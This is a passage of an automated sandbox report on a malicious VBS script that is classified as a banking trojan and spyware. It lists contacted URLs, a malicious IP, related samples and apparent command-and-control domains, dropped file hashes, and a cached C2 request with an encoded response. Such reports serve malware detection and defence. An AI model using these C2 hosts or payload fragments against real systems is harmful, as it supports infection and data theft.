                                                                                                                http://www.google.cz/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.soso.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.univision.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://search.ebay.it/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.asharqalawsat.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://busca.orange.es/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://api10.laptok.at/api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYM{0F63312B-2B78-11EB-90E4-ECF4BB862DED}.dat.9.drfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000023.00000002.488959273.0000000006300000.00000002.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://search.yahoo.co.jpexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://www.target.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://buscador.terra.es/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.typography.netDexplorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://fontfabrik.comexplorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://search.orange.co.uk/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.iask.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.tesco.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://cgi.search.biglobe.ne.jp/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown

                                                                                                                                    Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    47.241.19.44
                                                                                                                                    		unknownUnited States
                                                                                                                                    		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                    Analysis ID:321161
                                                                                                                                    Start date:20.11.2020
                                                                                                                                    Start time:13:32:27
                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 7m 52s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:light
                                                                                                                                    Sample file name:0k4Vu1eOEIhU.vbs
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                    Number of analysed new started processes analysed:37
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:3
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • HDC enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.bank.troj.spyw.evad.winVBS@29/40@7/1
                                                                                                                                    EGA Information:
                                                                                                                                    • Successful, ratio: 50%
                                                                                                                                    HDC Information:Failed
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    • Number of executed functions: 0
                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Adjust boot time
                                                                                                                                    • Enable AMSI
                                                                                                                                    • Found application associated with file extension: .vbs
                                                                                                                                    Warnings:
                                                                                                                                    Show All
                                                                                                                                    • Exclude process from analysis (whitelisted): audiodg.exe, rundll32.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                    • TCP Packets have been reduced to 100
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 104.43.139.144, 51.104.139.180, 104.42.151.234, 104.108.39.131, 23.210.248.85, 20.54.26.129, 205.185.216.42, 205.185.216.10, 51.103.5.159, 95.101.22.134, 95.101.22.125, 152.199.19.161
                                                                                                                                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, par02p.wns.notify.windows.com.akadns.net, go.microsoft.com, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, ie9comview.vo.msecnd.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net
                                                                                                                                    • Execution Graph export aborted for target mshta.exe, PID 6112 because there are no executed function
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    13:33:29API Interceptor1x Sleep call for process: wscript.exe modified
                                                                                                                                    13:34:04API Interceptor11x Sleep call for process: powershell.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    47.241.19.44earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                    • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                    6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                    • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                    a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                    • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                    03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                    • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                    2200.dllGet hashmaliciousBrowse
                                                                                                                                    • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                    22.dllGet hashmaliciousBrowse
                                                                                                                                    • api10.laptok.at/favicon.ico
                                                                                                                                    mRT14x9OHyME.vbsGet hashmaliciousBrowse
                                                                                                                                    • api10.laptok.at/favicon.ico
                                                                                                                                    0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                    • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                    1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                    • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                    4N9Gt68V5bB5.vbsGet hashmaliciousBrowse
                                                                                                                                    • api10.laptok.at/favicon.ico
                                                                                                                                    34UO9lvsKWLW.vbsGet hashmaliciousBrowse
                                                                                                                                    • api10.laptok.at/favicon.ico
                                                                                                                                    csye1F5W042k.vbsGet hashmaliciousBrowse
                                                                                                                                    • api10.laptok.at/favicon.ico
                                                                                                                                    0cJWsqWE2WRJ.vbsGet hashmaliciousBrowse
                                                                                                                                    • api10.laptok.at/favicon.ico
                                                                                                                                    08dVB7v4wB6w.vbsGet hashmaliciousBrowse
                                                                                                                                    • api10.laptok.at/favicon.ico
                                                                                                                                    9EJxhyQLyzPG.vbsGet hashmaliciousBrowse
                                                                                                                                    • api10.laptok.at/favicon.ico
                                                                                                                                    http://c56.lepini.atGet hashmaliciousBrowse
                                                                                                                                    • c56.lepini.at/
                                                                                                                                    my_presentation_82772.vbsGet hashmaliciousBrowse
                                                                                                                                    • api10.laptok.at/favicon.ico

                                                                                                                                    Domains

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    resolver1.opendns.comearmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    fY9ZC2mGfd.exeGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    H58f3VmSsk.exeGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    2200.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    5faabcaa2fca6rar.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    YjimyNp5ma.exeGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    0cJWsqWE2WRJ.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    08dVB7v4wB6w.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    9EJxhyQLyzPG.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    u271020tar.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    Ne3oNxfdDc.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    5f7c48b110f15tiff_.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    u061020png.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    4.exeGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    C4iOuBBkd5lq-beware-malware.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    api10.laptok.atearmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    2200.dllGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    22.dllGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    mRT14x9OHyME.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    4N9Gt68V5bB5.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    34UO9lvsKWLW.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    csye1F5W042k.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    0cJWsqWE2WRJ.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    08dVB7v4wB6w.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    9EJxhyQLyzPG.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    my_presentation_82772.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    44kXLimbYMoR.vbsGet hashmaliciousBrowse
                                                                                                                                    • 119.28.233.64
                                                                                                                                    a.vbsGet hashmaliciousBrowse
                                                                                                                                    • 8.208.101.13
                                                                                                                                    7GeMKuMgYyUY.vbsGet hashmaliciousBrowse
                                                                                                                                    • 8.208.101.13
                                                                                                                                    A7heyTxyYqYM.vbsGet hashmaliciousBrowse
                                                                                                                                    • 8.208.101.13
                                                                                                                                    c56.lepini.atearmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    2200.dllGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    http://c56.lepini.atGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    api3.lepini.atearmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    2200.dllGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    0cJWsqWE2WRJ.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    08dVB7v4wB6w.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    9EJxhyQLyzPG.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    C4iOuBBkd5lq-beware-malware.vbsGet hashmaliciousBrowse
                                                                                                                                    • 8.208.101.13
                                                                                                                                    PtgzM1Gd04Up.vbsGet hashmaliciousBrowse
                                                                                                                                    • 8.208.101.13

                                                                                                                                    ASN

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdChttps://bit.ly/35MTO80Get hashmaliciousBrowse
                                                                                                                                    • 8.208.98.199
                                                                                                                                    videorepair_setup_full6715.exeGet hashmaliciousBrowse
                                                                                                                                    • 47.91.67.36
                                                                                                                                    http://banchio.com/common/imgbrowser/update/index.phpGet hashmaliciousBrowse
                                                                                                                                    • 47.241.0.4
                                                                                                                                    earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    1119_673423.docGet hashmaliciousBrowse
                                                                                                                                    • 8.208.13.158
                                                                                                                                    1118_8732615.docGet hashmaliciousBrowse
                                                                                                                                    • 8.208.13.158
                                                                                                                                    https://bit.ly/36uHc4kGet hashmaliciousBrowse
                                                                                                                                    • 8.208.98.199
                                                                                                                                    https://bit.ly/2UkQfiIGet hashmaliciousBrowse
                                                                                                                                    • 8.208.98.199
                                                                                                                                    WeTransfer File for info@nanniottavio.it .htmlGet hashmaliciousBrowse
                                                                                                                                    • 47.254.218.25
                                                                                                                                    https://bit.ly/2K1UcH2Get hashmaliciousBrowse
                                                                                                                                    • 8.208.98.199
                                                                                                                                    http://sistaqui.com/wp-content/activatedg.php?utm_source=google&utm_medium=adwords&utm_campaign=dvidGet hashmaliciousBrowse
                                                                                                                                    • 47.254.170.17
                                                                                                                                    https://bit.ly/32NFFFfGet hashmaliciousBrowse
                                                                                                                                    • 8.208.98.199
                                                                                                                                    https://docs.google.com/document/d/e/2PACX-1vTXjxu9U09_RHRx1i-oO2TYLCb5Uztf2wHiVVFFHq8srDJ1oKiEfPRIO7_slB-VnNS_T_Q-hOHFxFWL/pubGet hashmaliciousBrowse
                                                                                                                                    • 47.88.17.4
                                                                                                                                    https://bit.ly/2Itre2mGet hashmaliciousBrowse
                                                                                                                                    • 8.208.98.199
                                                                                                                                    4xb4vy5e15.exeGet hashmaliciousBrowse
                                                                                                                                    • 47.89.39.18
                                                                                                                                    SVfO6yGJ41.exeGet hashmaliciousBrowse
                                                                                                                                    • 8.208.99.216
                                                                                                                                    TJJflelDEn.exeGet hashmaliciousBrowse
                                                                                                                                    • 47.52.205.194

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    No context

                                                                                                                                    Dropped Files

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    C:\Users\user\AppData\Local\Temp\earmark.avchd6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                      a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                        03QKtPTOQpA1.vbsGet hashmaliciousBrowse

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{0F633127-2B78-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:Microsoft Word Document
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):70760
                                                                                                                                          Entropy (8bit):2.034359629023354
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:rBZGZj2N9W2tCfvlM3ZltmsrtVesIZFOsStO6p5cZ:rHiaNUWgupvPJFYtq1yZ
                                                                                                                                          MD5:76BAE3760A7E056624D0226120260C2F
                                                                                                                                          SHA1:A5C8EFD8CB9D6EA583610C43A98D9337B7F2125F
                                                                                                                                          SHA-256:17BD2E6B3AE918E8E8248EB57E670C4E57966740BC8C35C48F33B0A830ADD024
                                                                                                                                          SHA-512:DCEF7E2E75241023DCDBA7BB4E43527E074B7653AC02787D2A5C6531821F11C44D3D7557813EB0B38F88E4623621AF6D14AE628A2A15D3AD58DCFC6B62027081
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0F633129-2B78-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:Microsoft Word Document
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):28164
                                                                                                                                          Entropy (8bit):1.9268944001243777
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:rnZcQE6SksFjN2YkWMMjYVsJxqVPGJlWA:rZ1vLshEcJj8sKODB
                                                                                                                                          MD5:862B7EA69B6D0472FA8AC833892C494F
                                                                                                                                          SHA1:BC77F91784DF7C902CF5B1F47C83E9B6407C41D7
                                                                                                                                          SHA-256:7B47C605246AEAA8928460C4A5AE4FC6924C5FFD12083ED5D09EDB4F421009CE
                                                                                                                                          SHA-512:D997B1AFC7DD0E32818BE0EE26EDC2B7CD46021F3FEA3248B54DCBD0B64D0BDA2BFA8F869971018DCE9E85B4EDDE0C4F7ABE4C904689BDBC192F69D5CE240858
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0F63312B-2B78-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:Microsoft Word Document
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):27584
                                                                                                                                          Entropy (8bit):1.9127183806686003
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:rOZNQ96OkvFjV2LkWSMxYpHcScVHcSQcVYA:raSovvhMvDxgHcxHclcB
                                                                                                                                          MD5:011F642808F0AFE4656C9EC945CECFBB
                                                                                                                                          SHA1:C9A9DA74AE4CDDF937A1FF1E5A69805B15D05328
                                                                                                                                          SHA-256:531310E8D6CA03BB5A55B8C01CA850270E4FB65B78A058AD392E823ED7FB6A19
                                                                                                                                          SHA-512:A2D1EAF779C5D76C8AE5BD52833668C5187392B084BB664A270DA44301AD46BD2CC0C1FC26CEF887AA104A08B5A8F904722D3798C12250DFFB9E18FF4B642294
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{15B14822-2B78-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:Microsoft Word Document
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):28148
                                                                                                                                          Entropy (8bit):1.9214715653777685
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:rlZ5Qt6zBSyFjF2wkW6MtYFxTPd16kGGA:rlZ5Qt6zkyFjF2wkW6MtYFxTPd16kGGA
                                                                                                                                          MD5:0F1719714B71D9E167C790D229798FAC
                                                                                                                                          SHA1:33D7F8D29EA172B80DE47E6792ABCB9E598C9ABE
                                                                                                                                          SHA-256:9F7F953C5DB32E5FE56E1ED786CBE77BDAC9DAEF39F1D1C87F1C57F638109C80
                                                                                                                                          SHA-512:6234991E77AAF4FCB7F2DB87ABCA87B57651E2DD1036782D3713A09589F6FC7F967110D2C041F5DD9C2C98AD83C594C102728E3F9B64C702AFB74F239D7099D5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\ghuK[1].htm
                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                          File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):2408
                                                                                                                                          Entropy (8bit):5.984213394225501
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:OurJo1eykcgE0yDBKjVqAW1iuR6RVWuYRJb77okJIfWo:nKzkyvGPW13R6vYRNsfz
                                                                                                                                          MD5:99911885EF8527B9BB520959D0400D23
                                                                                                                                          SHA1:A214A86649EBA314D4BF4C1ED2AC48CAC7EEBA1B
                                                                                                                                          SHA-256:6A56806C098AA9CD6ADFD325BE3E9A05FDA817BD175A469A5027339EEA4C9058
                                                                                                                                          SHA-512:58A1F7252A01A5EEC8375316FB178361DC6A7D1AA6275370B760D15376EB47DE50901CD5F024AB6B738EB22FC0447D249126F76ABA3B2EBF81F4E2BE3CB96F8E
                                                                                                                                          Malicious:false
                                                                                                                                          IE Cache URL:http://api10.laptok.at/api1/iAJCYcyHod24JwK9k/jIufCEIwS17P/jhvYu_2FkkI/QBl_2BM4T097uF/L2PDj462js5JIy2DrKfuc/n67M2HaktlcaJNbk/U5tmJV6FXYX9PYl/NoP4iCo0t3EEcSsTSD/GIKj7owQS/L_2F_2FDnVHC9KBZdZNo/37VIl0kIhqLuACLVIYX/V6vuh2W221NYLx6qfGiDKK/3s1hbscFurS3Z/Dxw7EJ3l/t2p9Z6brZ2tKJpChrU45Kjr/cjfC3DPjSn/RRT9C0xUE0vR_0A_0/Dfm26RmoxVkl/LnqMa8E23Vi/NuAD37gXc5rJtP/C2npqShAXAGl_2BaAJYmK/pi0zzpwPl/ghuK
                                                                                                                                          Preview: dc5Myj1zX7wL16anUxKQbz0PUOVZccb3OWc2KaU5+XF1MrQFi5BV7tYx7BVtZTNjiJ4fPn/SH+6LpMOl9zy0PHDvdc1lteTU0DMsO0xKrJ2AJBhibqs0KAZjyZ2sATERlhsdm7/JrNq5iWPBI026FWqTzpw/E+iy/D1HCAxeakEUXanAlqIYdJVX2tjtziBfVxf9HFOuD0gXtSQqptUTh1GuewVWXfg7K1l6qMZXohnzDheZ+hO4JWUdY1G6C5TU7nGN1CzHxAx9rzc+7dBrMEHMrX/hFNwnZC5YRnKDiiWkzqW3qNWXXU23dnvOno54EE6JnFwpj3a75ko3/blADxve+zDiEAqDbvVLJAn2SEEybIqQG+c1hUe4DM7q6dY6wTRaJ9+kr2Faq0KjxDpfAaz/J7eRc3F86mOUUfhhZ+qch//Zv9OEuUbEummoMGReikRWVckbemdwmEzVgNSCiHpCY3r0L/rCWu6Rnoxa8M/zPljyUBPcWXjFVJDxpOW7G6k/iaI8TEQDYJr+iDAWzmmCN1N89rVDh9xrDVNPNlpuifS7S1ByEqoMfoEpCnxManZ/5CmJes5lxUz1ksnZjPSTpcoVJcIBDP2Svyfq3smofUMt0BsVHGKDs7O9RKHta7HHWZ4cy8oiqh69Mh9d3WUcD6OzCzR2xgtGXLn3ik618P0/CZ/HozGsVwB671/tTlbLqnV9XUTaHtLmc57EPDB54VvJLM53YU0P7IceRAZiPfZ+Ad1GdKGoj2BmcRcuqjA6EQIDA3sy2AePwSr0wNqED9SRm/RvuyUvhoCrFizu/NKJG4ekC5vWFWOFo+X11EG3tLHladPjLUNDLRWz/Ii/89l0UFGTmkyHLIAw1wAOYZgkAohqmgmpEzhEgot2hGSg1MOhC+gnykRezoR7/P6726Zap1bjfYtnPJ7Wy6vUMKKhKYivcP/raiyymBY/h0MP2y3w+mCTOwMpD8D8v+6KHVOL4iD8miJtfC+m
